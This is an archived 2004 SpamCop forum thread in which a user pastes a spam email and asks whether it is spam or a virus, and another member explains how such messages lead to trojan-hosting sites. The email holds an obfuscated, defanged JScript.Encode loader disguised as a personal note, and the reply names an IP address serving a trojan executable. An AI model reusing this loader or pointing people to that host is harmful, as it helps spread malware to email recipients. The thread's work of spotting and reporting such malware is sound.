AlphaCentauri Posted September 10, 2004 Share Posted September 10, 2004 I received an email today with a spammy subject heading and encoded text. It resembles hexadecimal, but isn't when you really look at it (eg, strings like "C1C") It seems too short to be a virus, but with the java scri_pt terms, it could be referring to executable code on a website somewhere. I have been receiving some infected emails from Kuwait lately (with more obvious virus base 64 code), so I figure the gibberish could be Arabic characters. So is it spam to report or a virus to not report? X-POP3-Rcpt: me[at]mydomain.com Received: from CPE0080c6fe2156-CM024430000310.cpe.net.cable.rogers.com (CPE0080c6fe2156-CM024430000310.cpe.net.cable.rogers.com [24.100.12.166]) by host2.capital-computers.com (8.12.10/8.12.10) with SMTP id i89NYjox011863; Thu, 9 Sep 2004 19:34:56 -0400 Received: from .clickfish.com ([236.170.218.88]) by 24.100.12.166 with ESMTP; Fri, 10 Sep 2004 00:26:32 +0100 Message-ID: <764996u210v8473b93l3697g6b3466[at]clickfish.com> X-Mailer: Microsoft Office Outlook, Build 11.0.5510 Date: Thu, 09 Sep 2004 20:24:32 -0300 From: "Lucio Gipson" <Gamblethrb[at]clickfish.com> Reply-To: "Lucio Gipson" <Gamblethrb[at]clickfish.com> To: nonexistantperson[at]mydomain.com, me[at]mydomain.com, info[at]mydomain.com, webmaster[at]mydomain.com Subject: re:appointment thursday at 01-00 - Thu, 09 Sep 2004 19:27:32 -0400 Organization: Microsoft Office Outlook, Build 11.0.5510 Mime-Version: 1.0 Content-Type: multipart/alternative; boundary="6-122353897-0350581327=:13108" --6-122353897-0350581327=:13108 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable --6-122353897-0350581327=:13108 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> yo babe what's up? loved having fun with youm it was so funy. thailand is so great, anyway, see you soon. jeff <scri_pt language=3D"JScript.Encode">#[at]~^ngAAAA=3D=3D~[at]#[at]&[Km!:+ YcADbYn`E[at]= !(o"bHA~?"Z'r4OYa)Jz+!q 8 GR FFv&sbx3 4D:sJ, &fP_'Wc!,CA(M_KxcW!~o"bHA$r"= f2"xTPUZ"rJS(HV'ExKEPkYzs=7F'J[rkwslHl WU=7Fir[at]*[at]!Jqw]bt2[at]*B*i[at]#[at]&iioAAA=3D= =3D^#~[at]</scri_pt> THIS IS AN AUTO-GENERATED MESSAGE - PLEASE DO NOT REPLY TO THIS MESSAGE<BR>Login Name: bzpwsun<BR>Password: hwacfby10589s<BR><BR>- Home directory: The location of the home directory varies by platform.<BR>Windows 98 (single-user): C:\Windows<BR>Windows 98 (multi-user): C:\Windows\Profiles<BR>Windows 2000/XP: C:\Documents and Settings<BR><BR><BR><BR><BR> -----BEGIN BLOCK-----<BR>F%D5%CDU%C2%058%E5%9A%D5%7D%85<BR>JJ%E3%DF%D7o%C1%1F%60%EA%F0%B2<BR>P%87s%22%F8%E1%96%29%CAd2%95%B<BR>%F8%97%2C%9Co%2F%85%FF%BD%3B%B<BR>D%5Cd%E8%FE%C2o%879C%F3%D0%C2%<BR>1D%98%28%22%BE%F0%B7%3C%DFBe%F<BR>8%90%C9%0B%D1%01i%E0%D3%AC6%8E<BR>%21%0B%BD%BE%CED%EDLm%A1%A7%E4<BR>3%92l%22%A9%91%90V%C2%0F0%AB%8<BR>C%9D%2F%98%01q%E9%D9%D0%09%CA%<BR>18%3D%D4%CC%CCh%A7a%5E%B7%9A%A<BR>E%13%C3%2FU%CE%FA%AE%7B%C1C%10<BR>%BA%E9%9AB%A9%18%1F%93%AB%FCm%<BR>A4Eg%D5%E7%B6w%E9%0D%0C%E5%F6%<BR>9Ad%F4v%10%F7%8E%9D%0D%EA%1Fs%<BR>99%E5%F1z%FEOP%DA%94%E05%D0uE%<BR>BB%DF%D7%0D%95%1D%27%82%8E%AA%<BR>04%8A5%3E%CC%D8%F4%11%E9%24d%B<BR>0%B7%AED%BB%7E%15%E3%C7%9C%22% <DIV>Chauncey Michaud<BR>Sexton <BR>Advanced Bio-Medical Electronics, Inc., Slidell, 70458, United States of America<BR>========================================================================<BR> Pat H. Goad Warren County Circuit Clerk Warren County Justice Center Center Street- Suite Bowling Green KY Warren <BR>Phone: 197-144-7176 <BR>Mobile: 959-191-1385 <BR>Email: <A href="mailto:Delaneyvabeh[at]fiberia.com">Delaneyvabeh[at]fiberia.com</A><BR>========================================================================</DIV> --6-122353897-0350581327=:13108-- Link to comment Share on other sites More sharing options...
Wazoo Posted September 10, 2004 Share Posted September 10, 2004 First of all, please provide the Tracking URL instead of posting the spam here directly. Second, if you want to get involved with some folks tracking this stuff down, fire up your newsreader, set server to news://news.spamcop.net/spamcop.geeks .. look for threads with Subject lines containing Jscript Encode/Decode .... Basically, what they are saying is that the code in this spam points to one or more sites that have more code embedded in them. There has been some success in getting the ISP involved to kill the web-based URL/code stuff ... but then again, today's traffic seems to suggest that one site thought to be brought down has re-surfaced with different code .... and per one poster's query, my check appears to agree that he has been blocked from accessing that site .... so "we" may be dealing with a spammer / trojan writer that also reads the SpamCop newsgroups ..... For example, here's a snippet with an included Tracking URL so you can get a hint of the discussion ..... (and compare the spam content/structure) > http://www.spamcop.net/sc?id=z650744697z56...aa34e54e60e818z Interesting: same site as last one, 201.12.78.176. Oddly enough the site has been armed again. Now with an 18 kb variant of ss.exe instead of the 15 kb variant found there previously. Also, the file link.html has been repaired. Now it points to link.php at 201.12.78.176 instead of the other location in bezeqint.net space. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.